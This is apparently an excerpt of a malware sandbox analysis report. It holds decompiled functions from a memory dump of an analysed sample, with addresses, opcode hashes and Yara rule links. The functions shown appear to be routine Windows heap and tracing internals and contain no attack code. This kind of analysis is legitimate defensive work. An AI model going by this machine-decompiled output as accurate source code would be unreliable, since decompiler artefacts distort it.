                                                              			E00AF8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0xb1d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E00A47D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                              0x00af8f6a
                                                              0x00af8f79
                                                              0x00af8f81
                                                              0x00af8f84
                                                              0x00af8f8b
                                                              0x00af8f91
                                                              0x00af8f94
                                                              0x00af8f9e
                                                              0x00af8fb0
                                                              0x00af8fa0
                                                              0x00af8fa9
                                                              0x00af8fa9
                                                              0x00af8fbb
                                                              0x00af8fbc
                                                              0x00af8fbe
                                                              0x00af8fc3
                                                              0x00af8fd6

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3834f3c71e2485fc1ec196c8a64b6ea7905ce8088b153d8d9c936b3b0a2896d4
                                                              • Instruction ID: 1bb8c5a74454bb562047bcd95bb11ed105f2b920aed86ed7024b25f9e35627c1
                                                              • Opcode Fuzzy Hash: 3834f3c71e2485fc1ec196c8a64b6ea7905ce8088b153d8d9c936b3b0a2896d4
                                                              • Instruction Fuzzy Hash: F4014474A0020DAFCB00DFA8D545AAEB7F4EF58300F508459B905EB381EB34DA00DB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AE1608 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 46%
                                                              			E00AE1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0xb1d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E00A47D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                              0x00ae1608
                                                              0x00ae1617
                                                              0x00ae161d
                                                              0x00ae1625
                                                              0x00ae1628
                                                              0x00ae162b
                                                              0x00ae1636
                                                              0x00ae1648
                                                              0x00ae1638
                                                              0x00ae1641
                                                              0x00ae1641
                                                              0x00ae1653
                                                              0x00ae1654
                                                              0x00ae1656
                                                              0x00ae165b
                                                              0x00ae166e

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b60670bf66893abe6e58fcfe02f9688e8e0d3c48154e6280b1adb221e256ea5
                                                              • Instruction ID: 580ddc939a28895479b14217103c90643d5332dbdd66163e24d8f7800337e464
                                                              • Opcode Fuzzy Hash: 7b60670bf66893abe6e58fcfe02f9688e8e0d3c48154e6280b1adb221e256ea5
                                                              • Instruction Fuzzy Hash: F6F06271E14258EFCB04DFA9D506AAEB7F4FF14300F444059B915EB391EA349900CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A4C577 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A4C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E00A4C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xa011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E00AF88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                              0x00a4c577
                                                              0x00a4c57d
                                                              0x00a4c581
                                                              0x00a4c5b5
                                                              0x00a4c5b9
                                                              0x00a4c5ce
                                                              0x00a4c5ce
                                                              0x00a4c5ca
                                                              0x00000000
                                                              0x00a4c5ca
                                                              0x00a4c5c4
                                                              0x00a4c5c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a4c5ad
                                                              0x00000000
                                                              0x00a4c5af

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31f2216aac650c79550e2371b42672c8b3f33720fe5a633be05f51211a4a623b
                                                              • Instruction ID: 2ca92f32a008a174cd4de1fc8a7f2dc4655b20df05302dbe47706da11f625daa
                                                              • Opcode Fuzzy Hash: 31f2216aac650c79550e2371b42672c8b3f33720fe5a633be05f51211a4a623b
                                                              • Instruction Fuzzy Hash: 27F024BA8932948FD7B1C314C004B297BE49B84371F548467E40D83102D7A4FC80C243
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AE2073 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E00AE2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E00ADFD22(__ecx);
				_t19 =  *0xb1849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0xb18748; // 0x0
					if(__eflags <= 0) {
						E00AE1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0xb18724 & 0x00000004;
							if(( *0xb18724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0xb18724; // 0x0
					return E00AD8DF1(__ebx, 0xc0000374, 0xb15890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                              0x00ae2076
                                                              0x00ae2078
                                                              0x00ae207d
                                                              0x00ae2083
                                                              0x00ae20a4
                                                              0x00ae20aa
                                                              0x00ae20ac
                                                              0x00ae20b7
                                                              0x00ae20ba
                                                              0x00ae20bc
                                                              0x00ae20c9
                                                              0x00ae20c9
                                                              0x00ae20d0
                                                              0x00ae20d2
                                                              0x00000000
                                                              0x00ae20d2
                                                              0x00ae20be
                                                              0x00ae20c3
                                                              0x00ae20c5
                                                              0x00ae20c7
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae20c7
                                                              0x00ae20bc
                                                              0x00ae20d4
                                                              0x00ae2085
                                                              0x00ae2085
                                                              0x00ae20a3
                                                              0x00ae20a3

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75e7921774a8f2d53001abbb314b851ec7768439a004853a25eae72648e632c1
                                                              • Instruction ID: 37b10783f24c6c374becb590aadbf20229fd2062bffd1a462811f9b8837684dc
                                                              • Opcode Fuzzy Hash: 75e7921774a8f2d53001abbb314b851ec7768439a004853a25eae72648e632c1
                                                              • Instruction Fuzzy Hash: BCF0E57B8151D44FDF326B267A523E23BE9E795310FA94486E8915B3C6CD388C83CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF8D34 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 43%
                                                              			E00AF8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0xb1d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E00A47D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                              0x00af8d34
                                                              0x00af8d43
                                                              0x00af8d4b
                                                              0x00af8d4e
                                                              0x00af8d52
                                                              0x00af8d5c
                                                              0x00af8d6e
                                                              0x00af8d5e
                                                              0x00af8d67
                                                              0x00af8d67
                                                              0x00af8d79
                                                              0x00af8d7a
                                                              0x00af8d7c
                                                              0x00af8d81
                                                              0x00af8d94

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6723ee3b6843c8f774346a847c5b60b23ce64f1438515b7c5aae934279aa026
                                                              • Instruction ID: a7c23c1e36ec5e4a52ffc2b76bbaaff6b7d53d87f9f7eb1bce6940c0c764fb71
                                                              • Opcode Fuzzy Hash: c6723ee3b6843c8f774346a847c5b60b23ce64f1438515b7c5aae934279aa026
                                                              • Instruction Fuzzy Hash: A5F0BE70E0460CAFCB04EFB8D542AAEB7B8EF18300F508099F905EB291EE38D900CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A6927A Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 54%
                                                              			E00A6927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E00A6FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E00A692C6(_t11, _t14);
				}
				return _t11;
			}





                                                              0x00a69295
                                                              0x00a69299
                                                              0x00a6929f
                                                              0x00a692aa
                                                              0x00a692ad
                                                              0x00a692ae
                                                              0x00a692af
                                                              0x00a692b0
                                                              0x00a692b4
                                                              0x00a692bb
                                                              0x00a692bb
                                                              0x00a692c5

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                              • Instruction ID: e19496b774b5d4d160b322a5f51e84aaf875342d60504754313554f9595e0035
                                                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                              • Instruction Fuzzy Hash: 9EE0ED322406006BE721AE5ADC81B5376ADAF82720F004078B9041E283CAF6DC0887A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF8CD6 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 36%
                                                              			E00AF8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0xb1d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E00A47D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                              0x00af8ce5
                                                              0x00af8ced
                                                              0x00af8cf0
                                                              0x00af8cfb
                                                              0x00af8d0d
                                                              0x00af8cfd
                                                              0x00af8d06
                                                              0x00af8d06
                                                              0x00af8d18
                                                              0x00af8d19
                                                              0x00af8d1b
                                                              0x00af8d20
                                                              0x00af8d33

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ed531d2f018674fb544c85e745bb333b1241ed1a870caa1511348f4323424cdd
                                                              • Instruction ID: 7409813f887826776d9f7d95c03fb8b3f50a690ba33258f53c993023059577e6
                                                              • Opcode Fuzzy Hash: ed531d2f018674fb544c85e745bb333b1241ed1a870caa1511348f4323424cdd
                                                              • Instruction Fuzzy Hash: C0F08270A0464CAFDB04DBE8E946EAE77B8EF58300F504199F915EB2D1EE34D900C754
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A4746D Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 88%
                                                              			E00A4746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E00A3EB70(__ecx, 0xb179a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E00A695D0();
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                              0x00a4746d
                                                              0x00a4746d
                                                              0x00a4746d
                                                              0x00a47471
                                                              0x00a47488
                                                              0x00a8f92d
                                                              0x00a4748e
                                                              0x00a47491
                                                              0x00a47495
                                                              0x00a8f937
                                                              0x00a8f93a
                                                              0x00a8f94e
                                                              0x00a8f953
                                                              0x00a8f956
                                                              0x00a8f956
                                                              0x00a47495
                                                              0x00000000
                                                              0x00a47488
                                                              0x00a47473
                                                              0x00a47478
                                                              0x00a4747d
                                                              0x00a47481
                                                              0x00000000
                                                              0x00a47481
                                                              0x00a4747d
                                                              0x00a4747a
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fcb23e4ef133955eac28ddbe63100bdbe36f949413734698522b6f6430b526e4
                                                              • Instruction ID: e0b511be2b98d8903e7534dfc885fa5b4552745403678e53b10e09ae46eadcaa
                                                              • Opcode Fuzzy Hash: fcb23e4ef133955eac28ddbe63100bdbe36f949413734698522b6f6430b526e4
                                                              • Instruction Fuzzy Hash: 1DF0E23CA0C1C5AACF12AB68C940B7EBBB1AF84350F640665E861AB1A1E724DC00C785
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A24F2E Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A24F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E00AF88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E00A4C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xa01030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                              0x00a24f2e
                                                              0x00a24f34
                                                              0x00a24f38
                                                              0x00a80b85
                                                              0x00a80b85
                                                              0x00a80b89
                                                              0x00a80b9a
                                                              0x00a80b9a
                                                              0x00a80b9f
                                                              0x00000000
                                                              0x00a80b9f
                                                              0x00a80b94
                                                              0x00a80b98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80b98
                                                              0x00a24f3e
                                                              0x00a24f48
                                                              0x00000000
                                                              0x00a24f6e
                                                              0x00000000
                                                              0x00a24f70

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bbb46c1e96d139e47691f07e2c784b1a9c0273a45f3124be9e47de4a00e5301b
                                                              • Instruction ID: f0dcc814b0b8fe826a7a6a6b1d06d1607522f820557a16bdbda3a0d6d46a2df3
                                                              • Opcode Fuzzy Hash: bbb46c1e96d139e47691f07e2c784b1a9c0273a45f3124be9e47de4a00e5301b
                                                              • Instruction Fuzzy Hash: 0DF0E2325226988FD7B1E718C248F23B7E8AB047F8F444474E40587921C734EC88C780
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF8B58 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 36%
                                                              			E00AF8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0xb1d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E00A47D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                              0x00af8b67
                                                              0x00af8b6f
                                                              0x00af8b72
                                                              0x00af8b7d
                                                              0x00af8b8f
                                                              0x00af8b7f
                                                              0x00af8b88
                                                              0x00af8b88
                                                              0x00af8b9a
                                                              0x00af8b9b
                                                              0x00af8b9d
                                                              0x00af8ba2
                                                              0x00af8bb5

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c4ad1921843dcbbfdcd612b8ea824f81151ddc177f214ef1e7971c204ad44f5
                                                              • Instruction ID: df84154fe1712a4028589ce9a8cf6a24e32fc52ddea26253397a41c9c473f73a
                                                              • Opcode Fuzzy Hash: 1c4ad1921843dcbbfdcd612b8ea824f81151ddc177f214ef1e7971c204ad44f5
                                                              • Instruction Fuzzy Hash: 76F082B0A1425CABDB00EBA8DA06E7EB3B8EF04300F540459BA05DB3D1EF34D900C798
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5A44B Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A5A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0xb17b9c; // 0x0
				_t15 = __ecx;
				_t16 = L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E00A6FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                              0x00a5a44b
                                                              0x00a5a453
                                                              0x00a5a472
                                                              0x00a5a476
                                                              0x00000000
                                                              0x00a5a493
                                                              0x00a5a47a
                                                              0x00a5a47f
                                                              0x00a5a486
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 349465b2fec4d3f9f6a078652768fb6b4c1b5e5b274792550ab61dc8ac7bd466
                                                              • Instruction ID: 651e31cbfe86d9ddc44581182845995eee35788f92e1c896d31851df7154294a
                                                              • Opcode Fuzzy Hash: 349465b2fec4d3f9f6a078652768fb6b4c1b5e5b274792550ab61dc8ac7bd466
                                                              • Instruction Fuzzy Hash: E5E06DB2A41421ABD2115B58AC01B66A2A9ABE5B51F1A8135B904C7214DA68DD0587E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2F358 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 79%
                                                              			E00A2F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E00A5F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L00A44620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                              0x00a2f35d
                                                              0x00a2f361
                                                              0x00a2f367
                                                              0x00a2f372
                                                              0x00a2f38c
                                                              0x00a2f38c
                                                              0x00a2f394

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                              • Instruction ID: 955b2933dcdfae07da11697f2c2e5d73159107a7c928297dcff95289a8540092
                                                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                              • Instruction Fuzzy Hash: E2E0D832A41128BFDB21E6DD9E06F5ABBBCEB48B61F010175B904DB150D5709D00C2D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FF60 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A3FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xa011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E00AF88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E00A40050(_t14);
				}
			}










                                                              0x00a3ff66
                                                              0x00a3ff6b
                                                              0x00000000
                                                              0x00a3ff8f
                                                              0x00000000
                                                              0x00a3ff8f

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9af6abbe5a2a87b4fe4fc489da7d59a891d730004026da239798c12da69f05c6
                                                              • Instruction ID: c3b3dbc6f255ed156f29688e502a75b56f5b8a6002ac647cba49e999b83e9430
                                                              • Opcode Fuzzy Hash: 9af6abbe5a2a87b4fe4fc489da7d59a891d730004026da239798c12da69f05c6
                                                              • Instruction Fuzzy Hash: BDE026B0A25208DFD734DB51D140F2737AC9F92721F19803DF80A4B102C731DC80C246
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB41E8 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 82%
                                                              			E00AB41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0xb008f0);
				_t5 = E00A7D08C(__ebx, __edi, __esi);
				if( *0xb187ec == 0) {
					E00A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0xb187ec == 0) {
						 *0xb187f0 = 0xb187ec;
						 *0xb187ec = 0xb187ec;
						 *0xb187e8 = 0xb187e4;
						 *0xb187e4 = 0xb187e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L00AB4248();
				}
				return E00A7D0D1(_t5);
			}





                                                              0x00ab41e8
                                                              0x00ab41ea
                                                              0x00ab41ef
                                                              0x00ab41fb
                                                              0x00ab4206
                                                              0x00ab420b
                                                              0x00ab4216
                                                              0x00ab421d
                                                              0x00ab4222
                                                              0x00ab422c
                                                              0x00ab4231
                                                              0x00ab4231
                                                              0x00ab4236
                                                              0x00ab423d
                                                              0x00ab423d
                                                              0x00ab4247

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f539d2148d098a590dcb0c62bf6a671cec5f0723cd432b00d5ed09963285230
                                                              • Instruction ID: 591e219c3a4ee1dab66fe92e2af9381f69bb1d9fd859bf1741723ded82686898
                                                              • Opcode Fuzzy Hash: 6f539d2148d098a590dcb0c62bf6a671cec5f0723cd432b00d5ed09963285230
                                                              • Instruction Fuzzy Hash: A1F01575920700DECBA0EFA89A017D436F8FB48311FA0C17AA104872E6CF344C81DF02
                                                              Uniqueness

